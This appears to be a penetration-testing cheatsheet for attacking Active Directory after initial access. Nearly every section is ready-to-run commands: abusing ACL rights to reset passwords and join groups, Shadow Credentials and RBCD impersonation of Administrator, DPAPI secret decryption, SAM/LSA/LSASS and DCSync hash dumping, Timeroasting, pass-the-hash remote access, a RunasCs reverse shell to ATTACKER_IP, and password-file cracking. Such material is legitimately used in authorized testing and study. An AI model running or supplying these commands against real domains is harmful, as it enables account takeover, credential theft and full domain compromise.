ACE Abuse & Lateral Movement

After initial access in an Active Directory environment, BloodHound will often reveal ACL-based attack paths. This cheatsheet covers the most common ACE (Access Control Entry) abuses, credential extraction techniques, and lateral movement methods used in assumed breach scenarios.

ACE Abuse Quick Reference

ACE RightTarget TypeAttackResult
GenericAllUserForce password changeFull control of user
GenericAllGroupAdd member to groupGroup membership
GenericAllComputerRBCD / Shadow CredentialsImpersonate any user
GenericWriteUserTargeted Kerberoasting / Shadow CredsPassword hash or auth
WriteSPNUserTargeted KerberoastingTGS hash to crack
ForceChangePasswordUserReset passwordFull control of user
WriteOwnerAny objectTake ownership, grant rightsFull control
AddSelfGroupAdd yourself to groupGroup membership
WriteDaclAny objectModify ACL, grant GenericAllFull control
AddAllowedToActComputerRBCDImpersonate any user

Tip: GenericAll on a group only controls the group object itself (add/remove members, change properties). It does NOT give you GenericAll on the group's members.

GenericAll / FullControl

On a User

Force a password change without knowing the current password. Three methods depending on your tooling.

# Linux - net rpc
net rpc password TARGET_USER 'NewPass123!' -U DOMAIN/USER%PASS -S DC_IP

# Linux - bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# Linux - bloodyAD with pass-the-hash
bloodyAD -u USER -p :NTHASH -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# Windows - PowerView
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

On a Group

Add a user to the group to inherit its permissions.

# Linux - net rpc
net rpc group addmem "GROUP_NAME" USER -U DOMAIN/USER%PASS -S DC_IP

# Linux - bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP add groupMember "GROUP_NAME" USER

# Windows - PowerView
Add-DomainGroupMember -Identity "GROUP_NAME" -Members USER

On a Computer

With GenericAll on a computer object, you can set up Resource-Based Constrained Delegation (RBCD) or add Shadow Credentials.

# Option 1: RBCD (see RBCD section below)
# Option 2: Shadow Credentials
certipy shadow auto -u USER@DOMAIN -p PASS -account TARGET_COMPUTER$

GenericWrite / WriteProperty

GenericWrite allows modifying specific attributes on the target object. The most common abuse is setting a Service Principal Name (SPN) for Targeted Kerberoasting.

# Automatic: sets SPN, requests TGS, removes SPN
targetedKerberoast.py -u USER -p PASS -d DOMAIN --dc-ip DC_IP

# Manual: set SPN, request ticket, crack offline
Set-DomainObject -Identity TARGET_USER -SET @{serviceprincipalname='fake/spn'}

# Crack the TGS hash
hashcat -m 13100 tgs.txt ~/tools/wordlists/rockyou.txt

Tip: GenericWrite also enables Shadow Credentials as an alternative to Kerberoasting. Shadow Credentials is stealthier because it does not modify the SPN attribute.

ForceChangePassword

Allows resetting a user's password without knowing their current password. Same commands as GenericAll on a user.

# bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP set password TARGET_USER 'NewPass123!'

# PowerView
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

WriteOwner

Take ownership of the object, then grant yourself additional rights (e.g., ResetPassword), then exploit.

# Step 1: Take ownership
Set-DomainObjectOwner -Identity TARGET_USER -OwnerIdentity ATTACKER_USER

# Step 2: Grant ResetPassword right
Add-DomainObjectAcl -TargetIdentity TARGET_USER -PrincipalIdentity ATTACKER_USER -Rights ResetPassword

# Step 3: Reset password
Set-DomainUserPassword -Identity TARGET_USER -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

WriteSPN - Targeted Kerberoasting

Set an arbitrary SPN on a user account, request a TGS ticket for that SPN, then crack it offline.

# Automated (sets SPN, gets TGS, removes SPN in one step)
targetedKerberoast.py -u USER -p PASS -d DOMAIN --dc-ip DC_IP

# Crack the hash
hashcat -m 13100 tgs.txt ~/tools/wordlists/rockyou.txt

# Manual approach
# Set SPN
Set-DomainObject -Identity TARGET_USER -SET @{serviceprincipalname='fake/spn'}

# Request TGS
.\Rubeus.exe kerberoast /user:TARGET_USER /nowrap

# Remove SPN (cleanup)
Set-DomainObject -Identity TARGET_USER -Clear serviceprincipalname

AddSelf

Allows adding yourself to a group. Commonly seen on custom groups that grant additional privileges.

# bloodyAD
bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP add groupMember "GROUP_NAME" USER

# PowerView
Add-DomainGroupMember -Identity "GROUP_NAME" -Members USER

Tip: After adding yourself to a group, you may need to re-authenticate (new TGT) for the group membership to take effect in your Kerberos ticket.

Re-enabling Disabled Accounts

If a target account has ACCOUNTDISABLE set, remove the flag before using it.

bloodyAD -u USER -p PASS -d DOMAIN --host DC_IP remove uac TARGET_USER ACCOUNTDISABLE

Shadow Credentials

Requires GenericWrite or GenericAll over the target account. Adds a Key Credential to the target's msDS-KeyCredentialLink attribute, then uses it to obtain a TGT via PKINIT.

This is an alternative to Targeted Kerberoasting that does not require cracking. It directly returns a TGT and NT hash.

# Automatic - returns RC4 (NTLM) hash + .ccache
certipy shadow auto -u USER@DOMAIN -p PASS -account TARGET_ACCOUNT

# With pass-the-hash
certipy shadow auto -u USER@DOMAIN -hashes :NTHASH -account TARGET_ACCOUNT

# Result: TARGET_ACCOUNT.ccache + RC4 hash
export KRB5CCNAME=TARGET_ACCOUNT.ccache

Tip: Shadow Credentials requires ADCS to be present in the domain (PKINIT). If there is no CA, fall back to Targeted Kerberoasting or password reset.

DPAPI Lateral Movement

DPAPI (Data Protection API) protects credentials stored in Windows Credential Manager, browser passwords, and other secrets. You can decrypt these without admin rights if you know the user's password.

Locate Credential Blobs and Master Keys

# List credential blobs
dir C:\Users\TARGET_USER\AppData\Roaming\Microsoft\Credentials\
dir C:\Users\TARGET_USER\AppData\Local\Microsoft\Credentials\

# List master keys
dir C:\Users\TARGET_USER\AppData\Roaming\Microsoft\Protect\SID\

Decrypt with User Password

# Decrypt master key using the user's plaintext password
impacket-dpapi masterkey -file MASTERKEY_FILE -password USER_PASS

# Decrypt the credential blob using the decrypted master key
impacket-dpapi credential -file CREDENTIAL_BLOB -key MASTERKEY_HEX

Decrypt with Domain Backup Key

If you have domain admin access, export the domain backup key and use it to decrypt any user's master keys.

# Export domain backup key (requires DA)
impacket-dpapi backupkeys --export -t DOMAIN/USER:PASS@DC_IP

# Decrypt master key with the backup key
impacket-dpapi masterkey -file MASTERKEY_FILE -pvk domain_backup.pvk

# Decrypt credential blob
impacket-dpapi credential -file CREDENTIAL_BLOB -key MASTERKEY_HEX

Windows Credential Manager (Interactive Session)

Requires an interactive logon session (logon type 2). Use RunasCs to get one.

# Dump Windows Credential Manager (requires interactive session)
Invoke-WCMDump

Mass DPAPI Dump via nxc

# Requires local admin on the target
nxc smb TARGET_IP -u USER -p PASS -M dpapi

Credential Dumping

SAM - Local Account Hashes

nxc smb TARGET_IP -u USER -p PASS --sam

LSA Secrets - Service Credentials

nxc smb TARGET_IP -u USER -p PASS --lsa

LSASS - In-Memory Credentials

nxc smb TARGET_IP -u USER -p PASS -M lsassy

DPAPI Mass Dump

nxc smb TARGET_IP -u USER -p PASS -M dpapi

Tip: Always check SAM, LSA, and LSASS when you get local admin. Service account credentials in LSA Secrets are often reused across machines or have domain privileges.

DCSync

Requires DS-Replication-Get-Changes + DS-Replication-Get-Changes-All rights, or Domain Admin / Backup Operators membership.

# With plaintext credentials
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm

# With NT hash
impacket-secretsdump DOMAIN/USER@DC_IP -hashes :NTHASH -just-dc-ntlm

# With Kerberos ticket
KRB5CCNAME=ticket.ccache impacket-secretsdump -k -no-pass DOMAIN/USER@DC_FQDN -just-dc-ntlm

# Via nxc (full NTDS dump)
nxc smb DC_IP -u USER -p PASS --ntds

Tip: Use -just-dc-ntlm to extract only NT hashes (faster). Omit it to also get Kerberos keys and cleartext passwords if available.

Timeroasting

Exploits Windows NTP authentication to obtain MD5 hashes of computer accounts and trust accounts. These hashes can be cracked offline to recover passwords of computer accounts (which are sometimes set manually and weak).

# Capture hashes (requires domain user credentials)
nxc smb DC_IP -u USER -p PASS -M timeroast -o OUTPUT=timeroast.txt

# Crack the hashes (hashcat mode 31300)
hashcat -m 31300 timeroast.txt ~/tools/wordlists/rockyou.txt

Tip: This is most useful when computer accounts in custom OUs have manually-set passwords (e.g., Support-Computer1$). Default machine account passwords are randomly generated and not crackable.

RBCD - Resource-Based Constrained Delegation

Requires AddAllowedToAct (WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity) on a computer object.

Standard RBCD (MAQ > 0)

When the Machine Account Quota allows creating computer accounts.

# Step 1: Create a machine account
impacket-addcomputer DOMAIN/USER:PASS -computer-name FAKE$ -computer-pass 'Fake1234!'

# Step 2: Configure RBCD delegation
impacket-rbcd -delegate-from 'FAKE$' -delegate-to 'TARGET_COMPUTER$' -action write \
    DOMAIN/USER:PASS -dc-ip DC_IP

# Step 3: Get ticket impersonating Administrator
getST.py -spn cifs/TARGET_COMPUTER.DOMAIN -impersonate administrator \
    DOMAIN/'FAKE$':'Fake1234!' -dc-ip DC_IP

# Step 4: Use the ticket
export KRB5CCNAME=administrator@cifs_TARGET_COMPUTER.DOMAIN@DOMAIN.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@TARGET_COMPUTER.DOMAIN

SPN-less RBCD (MAQ = 0)

When you cannot create machine accounts, use an existing controlled user account instead.

# Step 1: Configure RBCD with a regular user account
impacket-rbcd -delegate-from CONTROLLED_USER -delegate-to 'TARGET_COMPUTER$' -action write \
    DOMAIN/ATTACKER_USER:PASS -dc-ip DC_IP

# Step 2: S4U2self (U2U) + S4U2Proxy
getST.py -u2u -impersonate administrator -spn cifs/TARGET_COMPUTER.DOMAIN \
    DOMAIN/CONTROLLED_USER:PASS -dc-ip DC_IP

# Step 3: Access
export KRB5CCNAME=administrator@cifs_TARGET_COMPUTER.DOMAIN@DOMAIN.ccache
wmiexec.py -k -no-pass DOMAIN/administrator@TARGET_COMPUTER.DOMAIN

Remote Access Reference

WinRM

# With password
evil-winrm -i TARGET_IP -u USER -p PASS

# With NT hash (pass-the-hash)
evil-winrm -i TARGET_IP -u USER -H NTHASH

# With Kerberos
evil-winrm -i TARGET_IP -u USER -p PASS -r DOMAIN

WMI / DCOM

# With credentials
wmiexec.py DOMAIN/USER:PASS@TARGET_IP

# With Kerberos
wmiexec.py -k -no-pass DOMAIN/USER@TARGET_HOSTNAME

PSExec

# With credentials
psexec.py DOMAIN/USER:PASS@TARGET_IP

# With NT hash
psexec.py DOMAIN/USER@TARGET_IP -hashes :NTHASH

RDP

xfreerdp /u:USER /p:PASS /d:DOMAIN /v:TARGET_IP /dynamic-resolution

RunasCs

Use when you need an interactive session on the target (e.g., for DPAPI, Credential Manager access, or UAC bypass).

# Reverse shell as another user
RunasCs.exe USER PASS cmd.exe -r ATTACKER_IP:PORT --bypass-uac

# Logon type 9 (network cleartext - useful for Kerberos context)
RunasCs.exe USER PASS cmd.exe -r ATTACKER_IP:PORT -l 9

Tip: RunasCs logon type 9 creates a network logon context similar to runas /netonly. This is useful when you need Kerberos authentication to remote services without actually logging into the target machine interactively.

Cracking Credential Files

Office Documents (Excel, Word, PowerPoint)

office2john document.xlsx > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt

Tip: If an Office file appears corrupted, check the magic bytes. A common issue is 50 48 03 04 instead of the correct 50 4B 03 04 (PK ZIP header). Fix with: printf '\x50\x4B\x03\x04' | dd of=file.xlsx bs=1 seek=0 conv=notrunc

KeePass Database

keepass2john database.kdbx > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt

Password Safe

hashcat -m 5200 database.psafe3 ~/tools/wordlists/rockyou.txt

ZIP Archives

zip2john archive.zip > hash.txt
john hash.txt --wordlist=~/tools/wordlists/rockyou.txt